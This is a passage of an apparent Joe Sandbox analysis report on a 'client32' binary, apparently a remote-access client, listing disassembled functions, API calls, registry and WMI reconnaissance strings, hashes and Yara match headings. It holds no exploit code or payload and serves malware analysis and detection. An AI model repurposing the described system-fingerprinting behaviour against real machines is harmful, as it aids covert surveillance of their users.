                                                                                                                                    • RegEnumValueA.ADVAPI32 ref: 1106142B
                                                                                                                                    • RegEnumValueA.ADVAPI32 ref: 11061492
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuerywsprintf
                                                                                                                                    • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                    • API String ID: 773354293-161875503
                                                                                                                                    • Opcode ID: ed40f47ab359aa6e196c957d35384363c9e80637470bc7c5d455341a0e314405
                                                                                                                                    • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                                                    • Opcode Fuzzy Hash: ed40f47ab359aa6e196c957d35384363c9e80637470bc7c5d455341a0e314405
                                                                                                                                    • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11146010 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1073 11146010-1114602b 1074 11146031 call 11145f00 1073->1074 1075 1114610d-1114611a call 11162bb7 1073->1075 1078 11146036-1114603e 1074->1078 1078->1075 1080 11146044-1114609f call 11162be0 GetVersionExA LoadLibraryA 1078->1080 1083 111460a1-111460af GetProcAddress 1080->1083 1084 111460ca-111460d8 GetSystemDefaultLangID 1080->1084 1085 111460b1-111460b8 1083->1085 1086 111460be-111460c8 FreeLibrary 1083->1086 1087 111460db-111460e4 1084->1087 1085->1086 1086->1084 1086->1087 1088 111460e6-111460ea 1087->1088 1089 1114611b-1114611e 1087->1089 1093 111460f2-111460f9 1088->1093 1094 111460ec-111460f0 1088->1094 1090 11146105-1114610c 1089->1090 1091 11146120-11146123 1089->1091 1090->1075 1097 11146125-11146129 1091->1097 1098 1114612b-11146132 1091->1098 1095 11146134-1114613e 1093->1095 1096 111460fb 1093->1096 1094->1093 1094->1096 1095->1090 1096->1090 1097->1096 1097->1098 1098->1095 1098->1096
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                      • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion
                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                    • API String ID: 925726728-545709139
                                                                                                                                    • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                                    • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                                                                    • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                                    • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1099 111457a0-111457c0 1100 111457c2-111457d6 call 11029a70 1099->1100 1101 111457d9-111457db 1099->1101 1100->1101 1103 111457ed-111457f5 1101->1103 1104 111457dd-111457e7 1101->1104 1106 11145971-11145986 call 11162bb7 1103->1106 1107 111457fb-1114582b call 110963a0 GetModuleFileNameA call 11081e00 1103->1107 1104->1103 1114 11145831-1114585c SHGetFolderPathA 1107->1114 1115 11145959-1114596a call 11142e60 1107->1115 1117 1114585e-1114585f 1114->1117 1118 1114588b 1114->1118 1115->1106 1121 11145884-11145889 1117->1121 1122 11145861-11145862 1117->1122 1119 11145890-111458cd SHGetFolderPathA call 11143a20 call 1102ad70 1118->1119 1131 111458d0-111458d6 1119->1131 1121->1119 1124 11145864-1114587b call 11029a70 1122->1124 1125 1114587d-11145882 1122->1125 1124->1119 1125->1119 1131->1131 1132 111458d8-111458e2 1131->1132 1133 111458e4-111458e9 1132->1133 1133->1133 1134 111458eb-111458f5 1133->1134 1135 111458f6-111458fc 1134->1135 1135->1135 1136 111458fe-11145913 call 11145240 1135->1136 1138 11145918-1114591d 1136->1138 1139 11145920-11145931 1138->1139 1139->1139 1140 11145933-1114593a 1139->1140 1141 11145940-11145946 1140->1141 1141->1141 1142 11145948-11145958 1141->1142 1142->1115
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                                                    • Opcode ID: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
                                                                                                                                    • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                                                    • Opcode Fuzzy Hash: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
                                                                                                                                    • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110155C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1143 110155c0-110155f0 1144 110155f6-1101560e 1143->1144 1145 11015610-11015616 1144->1145 1146 11015632-1101565e call 110ed130 call 110ed520 1144->1146 1147 11015617-1101561d 1145->1147 1153 11015735-11015757 call 110edb10 1146->1153 1154 11015664-11015669 1146->1154 1147->1147 1149 1101561f-1101562f 1147->1149 1149->1146 1153->1144 1159 1101575d 1153->1159 1156 11015670-110156af wsprintfA call 110ed130 call 110ed520 1154->1156 1166 110156b1-11015700 call 11162be0 RegQueryValueExA 1156->1166 1167 1101571a-1101572f call 110edb10 1156->1167 1161 1101575f-1101577a call 11162bb7 1159->1161 1166->1167 1172 11015702-11015718 call 11129e00 1166->1172 1167->1153 1167->1156 1172->1167 1175 1101577b-110157a0 call 110edb10 * 2 1172->1175 1175->1161
                                                                                                                                    APIs
                                                                                                                                    • wsprintfA.USER32 ref: 1101567A
                                                                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                                                                    Strings
                                                                                                                                    • %012d, xrefs: 11015674
                                                                                                                                    • PackedCatalogItem, xrefs: 110156E2
                                                                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                                                    • NSLSP, xrefs: 11015708
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValuewsprintf
                                                                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                    • API String ID: 2072284396-1346142259
                                                                                                                                    • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                                    • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                                                    • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                                    • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1180 110178f0-1101790a 1181 11017910-1101791e 1180->1181 1182 110179cb-110179d8 call 11162bb7 1180->1182 1183 11017920-11017927 1181->1183 1184 11017932-11017963 CoInitialize _GetRawWMIStringW@16 1181->1184 1183->1184 1186 11017929-1101792c WaitForSingleObject 1183->1186 1187 11017965-1101797e call 11164697 1184->1187 1188 110179bb-110179be 1184->1188 1186->1184 1194 11017980-11017986 1187->1194 1195 110179ba 1187->1195 1190 110179c0 CoUninitialize 1188->1190 1191 110179c6 1188->1191 1190->1191 1191->1182 1196 11017988 1194->1196 1197 110179ac-110179b5 call 1116470d 1194->1197 1195->1188 1199 11017990-1101799e call 111648ed 1196->1199 1197->1195 1199->1197 1203 110179a0-110179aa 1199->1203 1203->1197 1203->1199
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000338,000000FF), ref: 1101792C
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                                    • CoUninitialize.OLE32 ref: 110179C0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                    • API String ID: 2407233060-578995875
                                                                                                                                    • Opcode ID: e36d99758dc03e0598981b4f88c4856ef9492612d0c70df356ba7875e798591a
                                                                                                                                    • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                                                                    • Opcode Fuzzy Hash: e36d99758dc03e0598981b4f88c4856ef9492612d0c70df356ba7875e798591a
                                                                                                                                    • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1204 11017810-1101782a 1205 11017830-11017834 1204->1205 1206 110178db-110178e8 call 11162bb7 1204->1206 1207 11017836-1101783d 1205->1207 1208 11017848-11017879 CoInitialize _GetRawWMIStringW@16 1205->1208 1207->1208 1210 1101783f-11017842 WaitForSingleObject 1207->1210 1211 110178cb-110178ce 1208->1211 1212 1101787b-11017894 call 11164697 1208->1212 1210->1208 1214 110178d0 CoUninitialize 1211->1214 1215 110178d6 1211->1215 1218 11017896-1101789c 1212->1218 1219 110178ca 1212->1219 1214->1215 1215->1206 1220 110178bc-110178c5 call 1116470d 1218->1220 1221 1101789e 1218->1221 1219->1211 1220->1219 1223 110178a0-110178ae call 111648ed 1221->1223 1223->1220 1227 110178b0-110178ba 1223->1227 1227->1220 1227->1223
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000338,000000FF), ref: 11017842
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                                    • CoUninitialize.OLE32 ref: 110178D0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                    • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                    • API String ID: 2407233060-2037925671
                                                                                                                                    • Opcode ID: 7fe03c0a07b0f7c8829a27351349684dd2fb94aad29d92fbe6e61ac0174dbd6e
                                                                                                                                    • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                                                                    • Opcode Fuzzy Hash: 7fe03c0a07b0f7c8829a27351349684dd2fb94aad29d92fbe6e61ac0174dbd6e
                                                                                                                                    • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1228 11110040-1111004d 1229 11110060-11110065 1228->1229 1230 1111004f-1111005d CreateEventA 1228->1230 1231 11110067 1229->1231 1232 1111006c-11110084 CreateThread 1229->1232 1230->1229 1231->1232 1233 11110086-1111009a call 11029a70 1232->1233 1234 1111009d-1111009f 1232->1234 1233->1234 1236 111100a1-111100b7 WaitForSingleObject FindCloseChangeNotification 1234->1236 1237 111100be-111100c4 1234->1237 1236->1237
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,770E9EB0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                                                                    • CreateThread.KERNEL32 ref: 1111007A
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                    • API String ID: 2579639479-1136101629
                                                                                                                                    • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                                                    • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                                                                    • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                                                    • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1239 11145f00-11145f28 1240 11145f30-11145f3f 1239->1240 1241 11145f46 1240->1241 1242 11145f41-11145f44 1240->1242 1243 11145f4b-11145f4e 1241->1243 1242->1241 1242->1243 1244 11145f55-11145f58 1243->1244 1245 11145f50 1243->1245 1246 11145f5f-11145f74 RegOpenKeyExA 1244->1246 1247 11145f5a 1244->1247 1245->1244 1248 11145fe4-11145fe8 1246->1248 1249 11145f76-11145fad call 11143bd0 1246->1249 1247->1246 1248->1240 1250 11145fee 1248->1250 1254 11145fcd-11145fe2 RegCloseKey 1249->1254 1255 11145faf-11145fc0 call 11163ca7 1249->1255 1253 11145ff4-11146004 call 11162bb7 1250->1253 1254->1248 1254->1253 1260 11145fc7 1255->1260 1261 11145fc2-11145fc5 1255->1261 1260->1254 1261->1254 1261->1260
                                                                                                                                    APIs
